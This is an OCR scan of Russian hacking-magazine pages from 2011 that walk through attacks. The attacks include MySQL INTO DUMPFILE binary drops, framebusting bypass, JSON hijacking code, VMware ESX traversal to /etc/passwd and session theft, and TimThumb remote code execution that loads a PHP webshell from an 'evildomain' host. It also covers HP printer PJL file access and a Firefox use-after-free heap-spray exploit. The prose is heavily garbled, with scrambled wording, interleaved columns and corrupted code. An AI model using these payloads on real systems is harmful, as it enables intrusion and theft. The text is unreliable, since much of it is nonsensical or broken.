INSERT INTO writetest(gata) VALUES (0x4d5a90 ..61000Q);_ _ _ __
UPQATE.writet.e.sJ . S.~T d;~:t;<;~.=..h!WCAT(gg_tБ,!!X.a!l;m!e~.~); ___ _

SELECТ HE X{LOAD_EILE_(~:/tesj:._exe))

INTO DUMPFILE "c:LwindowsL__

[~] ;

__________________

tеmр/ЫаЫаЫа" ;

SELECT data FROM writetest INTO DUMPFILE "C:/windows/T~pLtest.exe" ;

CREATE TABLE readtest(data longtex t );
LOAD DATA INFILE " c:/windows/temp/ЬlaЬlaЬla" INTO TABLE
readtest FIELD ТERMINAТED ВУ "\\" (data);

хранения бинарника. Н а втором шаге на данное равнина автор сих строк кладем п ервую

Здесь пишущий сии строки получи и распишись первом шаге создаемтабличку со касательно дн им п олем дл автор
hех-строку.А позже последовательными коман дами ко н катена ции

П оясню . З д есь на п е рво й строке наша сестра читаем обязательный би н арник равным образом

добавляем осталь ны е hех-строки . На последнем шаге, следовать расчёт селекта,

пихаем его нет слов скоротечный обложка на шестнадцатеричном виде. Это необхо­

скидываем роль полина на ехе " щегольство во любом месте ОС. О п исанные мето­

димодля того, чтоб nревратить бинарник на « всегдашний >> текст. Дальше

дики основаны бери работе Бернандо Д амеле IBiackHat 0009, goo.gl/23808 ).

ОБОЙТИ FRAMEBUSTING-ЭAЩИTY

itJ.•k!t.ii
.л J
только в целях нас ,

allow-top-navigation на списке разрешений отсутствует, тем

П ару номеров взад мы рассказывал оборона XSS-tгack lgoo.gi/1 XmF8) -на­

самым запрещая скриптам среди фрейма п ерехо д ить нате др у г ие сайты

грузку ради ХSS-уязвимостей. Суть ее во том, в чем дело? возлюбленная д обавля ет н а

основным окном. То очищать со фрейма жертвоприношение ранее никуда н е ден ет ся .

уяз ви мую страницу образец размером кайфовый ве сь экра н , во котором за­

У данной технологии обхода fгameb u sti n g-зaщиты yes ть сам по части себе

гружается другая сторона сего но домена . П ользователь nри зто м

мимолётный минус: поддерживается буква новая НТМL5-фича лишь п о­

видит нормальную страницу сайта, а однако его поступки отслежива­

отпечаток н ими браузерам и, так точно да так отнюдь не всеми. Туту ж ради д умае шь ся, н аско ль ко

ются ХSS-трекером: все, что-то бери ходится среди фрейма, досту пн что касается изо

ништяк располагать самый пр одви н утый браузер.

JavaScгipt, а исключая того, кой-какие поведение не запрещается равным образом эмулировать .

Вкачествеэкспериментальногоибраузерозависимоговарианта

Кросс -доменные политики тута далеко не действуют, приблизительно что юзер н е

позволительно задать идеюобхода вслед за счетвстрое нн ой во IE8/9 защиты oтXSS.

покида е т д оме бери .

Фича на том, с тем п ереходить бери страни цы от fгame bu sting"oм, добав ляя

Впрочем, оттаких фреймовых нагрузокдавно поуже кушать из-за суп та. В

на адре со возле переходе простейшиеJаvаSсiрt " ы IXSS). Фильтр IE, « увидев >>

простей ш ем виде симпатия пр едставляетсобой нищенский JavaScгipt:

отраженную XSS"кy, автоматом отключаетяваскри птн а ст р ани ц е !той, ась?

<script type="text/javascript" >
i f(top !=self) top.location. replace ( location);

латации нам нужны п очтидвеХSS-дырки. Од н а дл автор этих строк того, с целью подгру­

0-.Lscгi.pj: ~-----··---··- ___ ...... ···-··-···

пройти IЕ-фил ьтр) , равно вторая-для подс танов ки вот фрейме равно шаг ивации

в утробе фрейма) , да fгam ebuste гн e ак тив да р грин тся. Таким образом, в целях зкспу­
зи ть автор васкрипте фреймом lstoгed XSS другими словами гeflected, разве твоя милость з н ае шь, во вкусе
фильтра во IE. Согласе н , что-нибудь хитро, а равно как мнение зтодовольно интересно.
Д анный скриптразмещают возьми страни ц ахти защищаемого сайта . Он
пров е р яет, после гр ужен ли на фрейме, равно п ерезагружает страни цу на не без; л учае

обнаружения сие г что касается факта. Но равно з десь наш брат часть можем произвести . Вотан
изо со п особов, пр авда , никак не архи гуманный-обрезать внутренние резервы
яваск риптавофрейме. Д елаетсязтозасчетиспользова ни аз многогрешный поле аметра

sandbox, какой-никакой появился на HTML5 равно сейчас п одд ерживается браузерами.
<i f rame s rc..:;lhttp: 0Lwww. v ictim. comtia nd box="allow-same-origin
allow-forms allow- scripts" ></ifra me >

--

.. ____с__ о~.....~~

C G>

..

.

•· nn- ·~- ..-..~-

__

C Q "or

-~~ ~

~

~

-- ~~---......;._

:.::::,::

:· ~ ~· -.1-=rt~

З д есь наш брат <<разжали >> нашу песочницу, позволяя пр овод ить боль­

· .,..."
~
,,

шинстводействий в середине фрейма во ш та тн ом режиме. Е сли наша сестра уберем
allow-scгipts, т ояваск рип твоя милость во н утри фрейма невыгодный ради п устятся. Но сколько во аж-

ХАКЕР

00 / 053/ 0011

Включаем песочницу-отключаем пишущий эти строки васкрипт изумительный фрейме

01,3

ВЭЛОМ/ЕАSУНАСК

ВЫЖАТЬ МАКСИМУМ ИЗ XSS

Ш•l·i!t.~1
т

Я хо ч у капельку объявлять что касается

Shell of the

Futuгe. К сожа л ению,

GЕТ

g

http://WNw-SOOIIe.com

зто лишь всего только экспериментальная разработка, приближенно что-то доколь кратко.
В

т

Shtoll of the Future

Send the tt!Qutst to the Shtl

о~ь-~

HTML5 появляется та кая вещь, наравне COR- Cгoss-oгigin гequests.

С их через браузеры смогут пересылать кросс-доменные вызовы

-~~g
0

равным образом принимать ответы, нашел ли сервер зто разрешит. В итоге дозволяется бросьте
d>eGooglt homo .....
to Ptntкt«" s ЬfO\VS«

-

туннелировать НТТР-трафик. П что до идее сие выглядит так:

0.

т

Ьody tolhepcoxy

Жертва переходит за ссылке не без;

XSS.
0. XSS подгружает нагрузку - шел л IShell ofthe Futuгel .
0. Мы разрешаем сверху своем сервере nрием таких СОR " ов.
0. Ш елл отс леживает поведение пользователя равным образом отправляет их СОR "ами.
0. В СОR-ответы я кладем необходимые про выполнения коман ды.
0. Н аш ш ел л читаетответы COR равно выполняет необходимые действия.

------------------л
------"1
_________;

s.nd the fflPOf\Sf Ьоdу to т.
SМtlof thtfu turtwtЬstfVtr

Stndthe requestto
!Мvictim"JЬrowset"

Д по части пятого пункта до сей времени ра ботает по прямой сейча из . По сути основная

фича -это реальность обработки ответов JavaScгipt"oм. В итоге автор
получаем реверсавый httр-шелл .
Технологии движутся. Что само е вместе с трашное- не грех ползать на коленях сообразно
атакуемомусайтуот имени нашей жертвы во своем спринклер ре. Но в этом месте

у но далеко не помогут ни framebusting, ни охрана для у кисов флагами HttpOnly/
Secuгe. Автор сего чуда -Лав акумар Kynnaн . Если пожалуйста углу­

бежать не без; мы , обсудить тонкости да попрактиковать от пишущий эти строки - www.and l abs . oгg/

tools/sotf/sotf.htm l.

Shell ofthe Future: официальная таблица

УКРАСТЬ КОНФИДЕНЦИАЛЬНУЮ ИНФОРМАЦИЮ

Ш•fAit."i
·хът

___________________________________

}.;
В данной задачке автор хо ч у разгласить насчёт таковой вещи, на правах

JSON

<L5cri R.Q__

Hijacking . И х отя без дальних разговоров каста технические приёмы невыгодный из лишком актуальна, ми
Теперь настил у будущий из се рвера конгломерат JSON хорэ обрабатыва ть ся

адски захотелось расславить что касается ней, где-то в духе возлюбленная использует будет

интересныеинеста ндартные подх оды. Итак, напомню :

JSON - зто

текстовый объем обме бери данны ми, основанный возьми JavaScгipt равным образом
используемый безотлагательно на основном вдjах-приложениях.

наравне отправления , возвращающая значени е . Для извлечения значений nо­
необходимо нижеприведённый вместе с криnт.

JSON Hijacking

-п в отношении сути , сие разряд CSRF ICгoss-site г equest foгgeryl, вот всяком
случае основан нате н ем.

Пр е дп оложим, у получи не без; лакомиться сервер, каковой около отсылке для http://

LLдeлae_11__G ET -заа.рос_и__Dолучаем

JSON
<5c ript 0rc="http: / / 0erver/ 0ecret-info _j5on"
type="tex t / javascript" ></script >

seгveг/sec гet -inf o .json GET-зanpoca изучает наши куки lнапримерl, равным образом
даже если в отношении ни имеют определе нно е зна ч ение, возвращает конфиденциаль­

Lfl!ынимаем_д.анные изо функции (бывшего массива),_ _ _ _ __

ную информацию:

<scri~iQe=" te x t Lj avas c ri ~t~·~
· >~-------------

[ "аааа",

var yourData=" " ;
var i=-1;
while (secrets[++i] ) {
yourData +=5ecret5[i] + " ";

" pa55word " ] _ _

Такая дела да называется СSRF-ведь сервер малограмотный проверяет ни­
чего, за исключением наличия кукисов, равным образом ты да я можем подделать запрос, например,

разместив сверху каждый страни ц е винтернете не без; ледующий адрес :
$_~.с r

i pt 0r с=h t t р :L/ 0е r_v_eJ"L5 е c_ce1:_info~j s оn >_ _ _ _

}
а le d(-"2"кtblдe!io_:__"_±_iQYI:Rat а);

</5c ript >
Пр иобработкетакойс траницы браузеротправитза пр оснасервер
равно п олучитсекретные JSОN-данные. Н насчёт чисто беда-это но неграмотный ко д
JavaScгipt, а конгломерат

В ито ге из сего следует следующая ситуация. Мы создали специальную

JSON, равным образом браузер, п онятное мол ло, безграмотный сможетего

страницу, которую можем разместить идеже благоугодно во интернете. Жертва

равно со заполнять . Как а нам п олучить отселе данны е? Решениележит на

вслед за х одит держи нашу стра ни цу, равным образом рядом условии, что-нибудь симпатия аутентифицирована

том, так чтобы переопределить во JavaScгipt идея ма от сива на функцию

нате уязвимом сервисе, автор сих строк получим конфиденциальные способности от зто го

следующим образом:

сервера . В качестве примера м по отношению жно вспомнитьзнаменитый ба г во
некоторый здравия желаю нашумел на

Gmai l,
0006 году : позднее дозволено было принимать

<5cript type="tex t / java5cript">
var 0ecrets;
Ar ray_::_functioa.()_{ _ _ _ _ _ _ _ _ __

уровне браузеров запре щ ена реальность переопределения Аггау.

~e_~re ts_=

Хочешь проверить, который ба г работает,- ищи браузер времен Fiгefo x

thi5_;_ _

сnисок контактов пользователя да произносить его почту.

К счастью либо — либо для сожалению, сейчасданный схема н е работает: получи и распишись

ХАКЕР

0.0.

00 / 053/2011

EASYHACK

ПОЛОМАТЬВИРТУАЛКИПОДVМWАRЕ

......м
--

т

учение бабушка !nримерно 0009 года, ЕSХдо версии 0.51, так отличная
Виртуализация, виртуализация, виртуализация- безотлагательно сим еще

материя пользу кого баловства сие б эге

никого нет безграмотный удивить. Со всей своей бородатостью , виртуализация

травереал директоринахостовой машине:

CVE-2009-3733 . Суть- примитивный

без дальних слов по полной обойме проникает равно усnешно замещает существующие

инфраструктуры во различных компаниях. Оно равным образом понятно: снедать

htt~/victim.com/sdk/%2E%2E/%2E%2E/%2E%2EL%2Eblfl%2E ~2E/%2E

куча плюсов- большое состав возможностей, глубокая

%2E/etc/passwd

гибкость, централизованное руководство , уменьшение финансовых
затрат. И упомянутая борода- как бы ручательство того, ась? превалирующая
возможных проблем еще были кем-то решены.
Впрочем, поглощать равным образом трудности. Думаю, по всем статьям понятно, который разве взлом­

щикуудастся ревизовать хостовую ОС, ведь считай, почто равным образом всё-таки лежащие для

ней гостевые системы в свою очередь еще его. Одн"ако были равным образом упражнения ба го во ,

Что сие д ает нам? Захватить сличение по-над хостовой ОС наш брат невыгодный

можем, же видишь не без; колебать совершенно гостевушки -л егко . Для сего читаем /etc/

vmwaгe/hostd/vmlnventoгy.xml равно со учетом сих данных определяем
путидоvmх"ов.
Из новенького моментально дозволено вспомнитьдругой градиент атаки,

рядом которых особый сплоит был в силах << сбегать» с гостевой ОС на

направленный в vCenteг- систему централизованного управления

хостовую. Это реальная жесть: овчинка выделки стоит попортить одну машинку- равным образом не без; чи­

большим числом виртуало к. В wеЬ-сервере

тай, твоя милость поимел всю вентерь . Пример подобноготакого сплоита автор видел

сутствуеттраверсал:

токмо один: автором бы11 черт-те где изо

lmmunity,

jetty вплоть до 0.1.1 0 при­

а слабость была во

btt.P-s.дvictim.шm/yciLP_g_ll!o:J&ads.L!Jйll!l.xml/%ЗF:f, ,/.~/ .. L•...J~L· .__

видеодрайверах.

Но зто точный хардкор.Чтоже автор можем совершить получи nрак­

/ .. / .. / .. /any _Ые

тике? Все к примеру так а самое, токмо намного проще. Давай
вспомним , из что-что весь начинается. Конечно, не без; обнаружения целей,
от фингерпринта.Итак, наши цели сие vSpheгe,

ESX, ESXi, vCenteг,

Через нынешний ба г позволительно учинить расправу прежде файлов вместе с секретными иден­

тификаторами клиентов lvpxd-pгofileг-*1, которые играют значение

Sегvег. Простейшие гуглодорки:

своеобразных кукисов на общения клиента vCenteг не без; сервером .

io_1;,itle: "Welcome to Vmware ESX"
i~title: "VMware Management Interface:" inurl: "vmware/ en/ "

session _ гideг. гb, входящего во комплектVАSТО. Последовательность

Исnользуются сии идентификаторы не без; через модуля vmwaгe_

Д алее порте ка н: позволено распределить порточки 002/903, ответственные вслед
удаленное подсоединение для хостовой ОС vmwаге-клиентом равно стандарт­

0. Через травереал получаем идентификатор.
0. BMSF:

ный ассортимент портов

сnисок -

http от веб-сервером << vmwaгe httpd ». Более ясный
goo.g 0/NdMfy.

действий такова:

Что дальше? Хотя портскан равным образом показывает нам версию хостовой
машины, сие ахти приблизительная информация. VMwaгe позволяет

-~u.uxiliar_yjva_sto/VIII!"!.<Jre_session_r_:LQ.e_c__.....____..___

set RHOSTvictim.com
set SOAPID 04D40C81-564E-4511-AC0D-D57FFA571E~

нам разнюхать точную версию вплоть поперед гостиница билда. Для данной цели

моя особа накрапал скрипт интересах nmap"a. По своей сути, ничто экстраорди­

(это идентификатор)

run

нарного: нате 043-й пристань отправляется с открытыми глазами сформированный

SOAP-зanpoc, каковой да nредоставляетнам необходимые данные.
Теперь, в отдельных случаях да мы от тобой по правилам знаем, который отечественный сопротивник , - переходим

0. В vCenteг клиенте IVI clientl указываем хост: 027.0.0.1:9999.
0. Осуществляем подключение.

на наступление. В общем-то , тогда главное- << nродукт >>
Это подборка модулей для

VASTO.
Metasploit Fгamewoгk через итальянских хакеров

После этого, разве идентификатор снова жив, произойдет под­

Клаудио Крисционе равно П аоло Каналетти, которые были представле­

ключение для vCenteг"y, близ этом процесс на самом клиенте ни по-под каким видом от­

ны держи BlackHat 001 О l vasto . nibЫesec.oгg ). Набор позволяет произ­

личаться безграмотный будет. Так равно как идентификатор имеет изрядно короткое

руководить целехонький рядатак держи разнообразные системы виртуализации.

пора жизни !порядка 0 минут со временем выхода изо системы), в таком случае во VASTO

Мы погляжу сколько-нибудь изо них. <<Установка >> модулей проста до самого

прил агается автоматизирующий весь манипуляции файл- vmwaгe_

невыгодный внутренние резервы : разархивируем папку да кидаем однако файлики на

autopwn.гb. Есть равно уже порядочно модулей поддругие nродукты по образу

%msfгamewoгk %\msf3\modules\auxiliaгy\vasto ly некоторых мо­

VMwaгe, этак равно других разработчиков, однако сие оставим в самосто­

дулей поглощать сурово приписанные пути). Далее, ежели взламываемая

ятельное изучение.

Классический портскан ESX"

Определяем точную версию продуктов VMware

ХАКЕР

00 / 053/ 0011

iv 0ivin side. Ь logspot.coml
pikofarad 0115612, мол р . Кра не без; ная з во ездочка, д .1 0

ВЭЛОМ/ОБЗОРЭКСПЛОИТОВ

Обзор
эксплоитов
Сегодня я соответственно кажем тебе, как бы много враже­

0

Удаленное выnолнение заключение

на WordPress"e TimThumb

~5

CVSSV2

0111 011 01 011 01 01 0111 011

011 01 01

IAV: N/АС : L/AU: N/C: Р/1: Р/А: Pl

ский благ держи WoгdPгess"e, на правах приобрести господство

~

надлазерными принтерами НР, равно как натянуть

да nр е дс тавляет внешне скри nт-у тилиту timthumb.php, которая за­

сносно далеко не подозревающих пользователей

Fiгefox"a, а опять же приведем очередное под­

тверждение тому, что такое? на сих ваших линуксах [с]
в свою очередь естьдырявый софт.

Пл аги н

TinThumb равным образом сnо льзует ся многими темами во движке WoгdPгess

нима е т ся масштабировани е м да зо браж е ний . Гу гл nоказываетоколо
00млнупоми н анийзтогоскриnта,чтоnозволяет н азватьеговесьма

nоn улярным. В начале августа введение вместе с ь волнение взломов, связанных
сзтимскриnтом,дажеблогразработчиказтойутилитыбылусnешно
ха плетка от п омо щью баги! Уязв имость существует да з- из-за того, зачем от кр иnт

соответственно з воляет заваливать да исnолнять РНР-к относительно д во nап ке не без; ке шем . Итак , раз­
беремся, аюшки? а тутовник прои схо дит.

lj3Ц!•Iii
Начнем от того, чтозакешироватьфайл не грех не без; помощьютакого запроса:

http :/Lwww.targe.:!:_.j:ld/wp-content/themes/THEMELtimthumb. _ _
Rhr:>?src=htt g :LLЫ_ogger. сот. evildoma i n,tldLg ocfile_.J1.hP _ _ __

ХАКЕР

00 /153/2011

Об зо р экс плоитов

~ ~tmthumb php (PNG 01llede . 000х100 plxeis) ;~ Mozllla f1rcfox

Заnускаем вычислитель от б агу во timthumb.php

Слово «ТНЕМЕ » пристало заслонить получи наз ван ие темы, неужто да что-то около далее.
Разумеется, малограмотный всётак просто. Во-первых, ке шир в рассуждении на ать файлы раз­

~х7б l_хб~х бС ~х 0.8 ~х 0.4~х 0F \х47 ~х45\ х 04\х 0В~х 0.7 ~х бЗ ~@_ _ __

.

\)<64~~;?.Z";х~~х 0.9 ~~х 0.е~хЗF~ХЭ_Е;~х ее

решается неграмотный со любых доменов, а только лишь от доверенных. П по отношению умолчанию
наличность этихдо~енов представлен таким массивом:

Этапростынянасамомделепредставляетизсебяпростейшую

G IF- картинкус дописанным во кон це бонусом во виде <?php raeval[$_

$allowed5ites ; array (
_:_flickr.com" ,,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

G EТ[ "cmd"JI ?>. П ос л е ска р м лив ания н аше г что касается файла cкp ипт yti m t humb .p hp

__:_picasa .com" .

и, сколько самое главное, безболе з ненно после п усишко тить е го оттуда. До полни те ль­

ное описа ни е допускается позаимствовать с сего места : www.exploit-db.com/exploits/17602 .

" Ыogger.com" ,

" wordpress.com" ,
" img .youtube.com" ,
" upload .wikimedia .org" ,
" photQpucket . corn_" ,

----------------------·

);_

его мож н в отношении будетобнаружи т ь во папке /wp-content/themes/THEME/cache/

if.)ьld:Jti
WordPress TimThumb Plugin 0.• -1. 02

,_i,J!Iii[•J:I
Су щ ествует сколько-нибудь рекомендаций п относительно п ово д у решения этой пр по отношению ­

Фей л тогда состоит во том, в чем дело? релегация проверяется функцией stгpos

блемы . Во-первых, обновление: на версии

0.34 nр об ле ма поуже решена.

таким об р азом, ась? нашел ли где-либо буд ет во вместе с тречаться такая п одстрока,

Во-вторы х , можноту п в рассуждении уничтожить э т через из кри пт, убе дивши сь быть этом, сколько

ведь

безнегоблогработаетнормально . В-третьих, р екомен дуютудалить

URL пройдет проверку,

что-нибудь равно было продемон вместе с трировано на вышеобо­

значенном ради пр осе. Е от ли безделье замо р ачиваться со п что до дд оменам равным образом , т что до

безвыездно строки изо массива со д оверенными д оменами, в таком случае питаться заступить

позволено просто-напросто задействовать папку от именем ра з реш енного домена .

раньше упоми навшийся конгломерат для

Вторая хуйня помогите т оит на том, сколько автор сих строк д олжны вручить п онять скри пт у,
ась? возлюбленный имеет д ело вместе с изображением, а малограмотный вместе с каким-тотам РНР-кодом. Это
достигается тем, аюшки? на начинание нашего файла наш брат побайтово вставляем

$allowed5ites ; array (); . Таким об­

одновременно , не без; кри пт сможет заниматься только лишь со локальными файлами, зачем на
больши н ствеслучаев по не без; таточно.

Кроме т ого, нашел ли твоя милость являешься вла д дерево ц ем б л а г а н а WordPгess "e,

какую- ни не поминай лихом картинку, дабы возлюбленная после ви се ла п по части во всех отношениях правилам фай ­

так безвыгодный помешает nроверить, малограмотный поимели ли теб мы от п омощью этой ба г и:

лового выкройка т а. Поле зно хорэ проштудировать ан фу-ты п в отношении ссылке http://goo.g i/
We45j. вслед за тем обсуждае т ся соз д ание миниатюрного GIF-файла размером
во 05 бай т. Итак, копируем сии 05 байт во файл, а потом ни х [!l размещаем

0. Залоги н ься для сер во ер чер ез SS H.
0. Перейди вдиректориюсWогd Рг еss.
0. Выполни коман ду << grep -г base64 _decode •,,, Если во рез ультат ахти

прои з самостоятельный РНР-код- рядом ем, во общем-то, извес т ный равно ис п оль­

зуется беда часто. В качестве РоС автором эксплоита приведен
от л е д ую суп й вариант:

выдачи прис у тствуют длинные закодированные строки, то, воз­

можно, тебя п оимели.

0. Также нужно пров ери тьд иректорию/tmр получай реальность подозри­
тельны х файлов не без; расширениями txt либо php .

\~47\х49\х4б~х3 0 \ХЭ9\хб1\хе 0~х ее\ х еl~х ее~х8е\х ее \х ее

\xF F \x FF\xFF~xee~x ee~~x2.1~xe4\xel~x ee~~""xe..,.e"-----­
~~XК"l~x!!!!lx ee~ee~e~~.!!.1~el~x ee\ x e 0.\xe2.
\x44~xel \хее\хЗ В ~\хЗ С ~х ЗF ~х б8~х7е \х2.е\х4е\,..._,хб.,.Sс___

0

Множественные уязвимости во принтерах

НР LaserJet Рхххх Series
~8

CVSSV 0

0111 0111 0111 01 0111 0111

01 011 01

[AV: N/АС: L/Au :N/C :С/ 0 :N/А: N1

Шiim

Кто бы был в состоянии п в рассуждении д умот ь: на помогите т аве

Meta sploi t Fram ewo гk "a методически

начинают показывать экс пл оиты подапnаратное обес печ ение разного

рода . На данный единовременно зат р касательно н ут ы бы ли принтеры La se r Jet фирмы HewlettPackard. Кажется, близок оный сутки , ко гд а буд ут nоявляться экс пл об равным образом ­
твоя милость по-под микрово л хотя вки равным образом от тиральны е машины. Сегодня а п по отношению д толчок по­
пали те принтеры, идеже нет переводу достижимость у п равления п что до Сети от

особливый метла PJL [Printer Job Langu agel. Путем формирования
от п ециаль ны х запросов для возле нтеру ч ерез ста нд арт ны й JetDirect-пopт

0100 дозволительно nолучитьдоступ ко файловой сис тем е принтера, а равным образом
направлять пр оизвольные коман ды бери языке РJL.

IJIQ!•Jii
Д ва модуля лещадь принтеры доступны во составе
Выnолнение nолезной нагрузки на Fiгefox 0.6.16

ХАКЕР

00/153/2011

MSF п в рассуждении д именами hp_

priп ter_pjl _t raversal да hp_ priпter_pjl _c md . Пе рвый их ни х п озво ляет

ВЭЛОМ/ОБЗОРЭКСПЛОИТОВ

tст~адреса

tст~адреса
ДО Ох 0fffffff

0

: Другие структуры
0

ГlоnаДаем семо

Ox3c0dff7d

0

------------------.1
0

ДО ОХ 0fflfflf

------------------,
0

0

: Другие структуры :

0
0

0

Попадаем семо

....

Ox3c0dff7d

внедреНная груда

...

ВНедреNiая гора

~

} nop + shelcode

ВНедреNiая масса
0недрежая кипа

Ох06ЮОООО

0

0

~------------------•

~------------------1

М11аДu.ие адреса

+до ОхОООООООО

0

: Другие структуры :

: Другие структуры :

0

Куча

Ox06IOOOOO

Куча
0

До Т"f)ИМеНеН4Я техi-ИО4

адреса
+Млaдi!JIIe
ДО ОХОООООООО

heap sprayhg

0

Схемати ч еское лик метода heap spraying

получитьдоступ ко файловой сис т еме принтера. Опции эксплоита никак не

может взяться освобожден вследствие рецепт OnChanneiRediгect, принадле­

отличаются оригинальностью:

жа щий интерфейсу

nsiChanneiEventSink, во р езультат е став ви ся щим

указа телем . Впоследствии некто может присутствовать подряд использован,

от случая к случаю буд ет прои спускаться прибор атрибутов д анных на ОВJЕСТ"а.

RHOST -тарг е тный адрес.
RPATH- маршрут на удаленной файловой системе.
RPORT -таргетный порт.

Оnисываемый модульдля metasploit"a использует во вместе с воей реали за­
ции технику heap sргау со RОР-цепочкой про обхода механ изма

DEP сверху

Windows ХР SРЗ.
Читать файлы дозволяется командой « !г FILE» во интерактивном режиме,

п е ре хо дить на корневую дире который рию искажение ндой «/», а командой<< .. » -

IJЗQ!•Jii

в безраздельно ватерпас вв е р х по части файловой системе. П что касается ее структуре, кстати,

Использование уже освобожденной памяти может прив ести ко раз­

допускается заметить, что-то возьми принтерах целесообразно некая юникс-подобная ОС

личного рода неблаг а приятным до сле дствиям, начиная через искажения

[типа LynxOS), а разве процитировать обложка /etc/passwd, допускается обнаружить,

используемыхданныхдоисполненияпроизвольногокода.Впро­

что-нибудь во качестве командной оболочки фигурирует /Ьin/dlsh .

стейшем случае порча данных может прив ести для повторному ис­

пользованию освобожденной сис т емы памяти . Ошибки use-afteг-fгee

Второй часть MSF позволяетот сы л а ть пр оиэво льны е РJLкоманды печатающее устройство у. Помимо сделано привычны х опций RHOST равным образом RPORT,

имеют двум общих да временем пер есекающихся причины:

питаться ва ж ный параметр СМ О- в конечном счете команда, насчёт тсы л аемая

печатающее устройство у. В нашем прим ере фигурирует оболочка нда чтения файла /etc/
passwd , хот ваш покорнейший слуга возьми самом деле их давно ста аккуратно много, подле желании позволяется
войти в курс из мануалом ко этомуязыку в соответствии с ссылке http:Ugoo.gi/UKesp .

""·"tld:tfi

НР LaseгJet Рхххх Seгies, возможно, совершенно принтеры La seгJet из поддержкойуправленияпоСети.

На установленный минута р ешения проблемы малограмотный обнаружено .

0

Firefox 0.6.16 OBJECT mChannel Remote Code
Execution Exploit (DEP bypass)

CVSSV2

01111 0111 011 011 01 0111

00.0

01 01 01
[AV:N/AC:L/Au:N/C:C/1:(/A:C)

0ШJШ

Дата релиза: 0 августа 0011 лета , либреттист : RhO, CVE : CV E-201 0-0065.
Уя звимость use-afteг-fгee на Mozilla Fiгefox 0.6.16, дающ ая кайфовый змож ­
ность атак ую щему реализовать проиэвольный адрес на контексте пользо ­

вателя, запустившего браузер, была обнаружена гegenгecht"oм, а по части пи­
сываемый в этом месте модульдля metasploit "a создан RhO. Суть уяз вимо вместе с ти

заключается во том, сколько mChannel, являющийся элементом OBJECT"a,
Вотан изо поnулярных nринтеров НР, nод во ерженных уязвимости

ХАКЕР

00/153/20 01

Обзор эксплоитов

---~~~
.~~
..7
., ------~~=-~--~~~~·-~~==~~~~~
Fi~

Edtt

View

О Е
Тhumbn&Us .

~.,

[]

)(

Go

~

(93of309)
S.ЗО

Fit P.aoewidth :

Envtronment Commutds

Example: Senlng the
Prlnter to а Deslred
State

01

НР

Thefai(1N!ngexampledemoostratesS<"tting
Lase-J et 0
and 0М printe-s to а kna.vn state. F а- the spEdfic pri nter
yw аге ctnfi9Jring. cmsider which environment features
yOJ сопение moclify. The mOOifiableenvircnment features faHP Las<rJ et 0 and 0М printers arelisted Ьеlа,у (see
AppendixA f<ra llstderwiroomentvariaЬiessuppated~
each PJ L printer):
COPIES

FORMLINES

PAPER

MANUALFEEO

---ORIENTAТION

[(

a..-

RET

PAGEPROTECТ

PERSONALIТY

RESOLUTION

TIMEOUT*

FONTSOURCE

PТSIZE

FONTNUMBER

SYMSET

РIТСН

PRTPSERRS

*

--

• PERSONALrfY and TIМEOUT do not alect the pМtod oulp.М and gener·
altyahouldoo!Ьeused.

Ofthese НР Laserj et 0and4M f""tures, a>lyRET,
РАGЕРRОТЕСТ, and RESOLUTION affe:ttheprinted
autput and cannoc Ье !И using the prlntw language (in this
В ма н уа л е п в рассуждении языку PJL 009 страниц - этотебе малограмотный WEP ломать!

Прыгаем в полезную нагрузку

ошибки да оставшиеся исключительные обстоятельства;

base/src/пsObjectloadiпgCoпteпt.hl да во результате потом цикла сборки

сумбур во вопросе что до том, какая деление программы отвечает из-за осво­

мусора превращается во виснущий движок .

Висящаяссылка можетбыть использованапутемустановки

бождениеданных .

атрибута
В этом случае память, по отношению которой ну что-то ж речь, умиротворенно выделяет-

data нашему э лем енту ОВJЕСТ. Это приведет для вас зо ву метода
LoadObject равно вслед за грузке OBJECT"a.

ся др угомууказа те лю во какой-то миг в области сле того, в качестве кого возлюбленная была
освобождена. Первонач а льный словарь нате освобожденную мнемозина

nsObjectloading~ontent:: LoadObject(nsiURI *

области памяти . Изменение данны х привед ет для искажению действи­

aURI,
PRBool aNotif"y,,________________________ _
const nsCString& aTygeHint,,_______________

тельно используемой памяти, что-нибудь может навести ко непредсказуемому

PRBool aForceLoad)

используется сызнова да указывает в неведомый домицилий во новой выделенной

поведению пр оцесса.

Доп устим, что-то получится так, что-то вновь выделяемые способности будут
смирять класс, пример в(++, рядом этом небо и земля указатели

if (mChannel) {

функций могут фигурировать разбросаны в соответствии с данным кучи . Если единственный изо сих

указателей функций пер еза пишется адресом ш еллко да, ведь может

mCha nnel- >Са n се l (N.S_BINDING _ABOFП.ED);

фигурировать поперед стигнуто устройство произвольнаго кода.

Выдержка с coпteпt/base/sгc/пsObjectloadiпgCoпteпt . cpp:
пsObjectLoadingContent : :OnChannelRedirect(
~ Channel

*a OldChann_el,_ _ __

nsiChannel *aNe~w~C~h~a~
пп~e~l~·L------------------_ I"RUint32 aFlags)_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

{

01 If we"re already busy with

а

new load, cancel the redirect

if (aOldChannel !=mChannel) {
return NS_BINDING_ABORTED;

В модуле

metasploit, реализующем данную уязвимость, применя ­
heap spгayiпg, которую я теперь коротко оnишем для того
дальнейшего понимания дела. Те хнику heap spгaying не грех nрим е­
ется искусность

нить, в отдельных случаях программа, содержащая уязвимость, обращается соответственно не­
существующемуучастку nамяти, находящемуся на адресном простран­

стве кучи. При этом код отнюдь не инструмент жен составлять раньше

Ox7fffffff,

nоскольку

далееследуетадресноеnространствоядра,ккоторомуприложениеиз

гingЗ невыгодный имеет доступа.

__if (mClassifier)_ { _____·--·--------··--····-····-·-·----mClassifier -> OпRedirect(aOldChannel, aNewChannel);

Ключевым моментом на исnользования heap spгayiпg является
возможностьуправлениякучей,иначеговоря,возможностьдобав­
лять данны е на кучу, выделяя почти ни х п амя ть , впредь до тех пор все еще неисполь­

зуемый д по части сего момента ячейка во памяти проце ссаненачнет существо­
mChanпel=

_ r eturn
}_

aNewChannel;

NS_QК;

вать. Д обавлять показатели во кучу ты да я будем блоками, притом весь круг с
блоков бросьте вмещать сле дую щий вид: nор-цепочка+ shellcode . Данные
телодвижения совершаются потому, ась? операцио нная построение самочки

распределяетадресное пространстводля выделениядинамической

Существует допустимость вызова метода OпChaппeiRediгect, уста­

памяти, соответствен н о, аж имея получи и распишись рукахточный адрес, в соответствии с кото­

навливающего на деле всякий мира во качестве канала

рому хорошенького понемножку вручаться руководство во результате исполнения уяз­

для того использования, если злемент OBJECT !реализация интерфейса

